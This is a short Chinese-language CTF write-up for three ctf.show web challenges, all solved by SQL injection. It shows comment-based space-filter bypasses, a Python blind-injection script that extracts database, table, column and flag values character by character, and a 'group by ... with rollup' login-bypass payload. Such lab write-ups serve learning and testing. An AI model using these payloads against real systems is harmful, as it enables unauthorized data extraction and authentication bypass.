web7
查看列表文章发现?id= 判断为sql注入
当有空格时会报错,用/**/绕过,得到注入点
盲猜flag from flag
web8
测试发现过滤了空格,逗号,and
当url判断为真时有回显
数据库视角:
进行盲注
substr(database(),1,1) 等同于
substr(database()from 1 for 1)
写python 脚本
import requests
import re
s = r'<h4>If</h4>'
flag = ''
url = 'http://6327c4bc-77a9-431f-9ccb-95564a82c238.chall.ctf.show/index.php?id=0/**/or/**/'
for i in range(1,50):
for j in range(31,129):
#html=requests.get(url+'ascii(substr(database()/**/from/**/'+str(i)+'/**/for/**/1))='+str(j)) #库
#html=requests.get(url+'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/'+str(i)+'/**/for/**/1))='+str(j))#表
#html=requests.get(url+'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/'+str(i)+'/**/for/**/1))='+str(j))#字段
html=requests.get(url+'ascii((substr((select/**/flag/**/from/**/flag)from/**/'+str(i)+'/**/for/**/1)))='+str(j))#flag
r=re.findall(s,html.text,re.S)
if(r):
flag += chr(j)
break
print(flag)
print('------------------------------------')
得到flag
web10
点取消下载到源代码文件
判断passwd
gourp by password 将password字段分组
with rollup:在group分组字段的基础上再进行统计数据
payload:username='or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=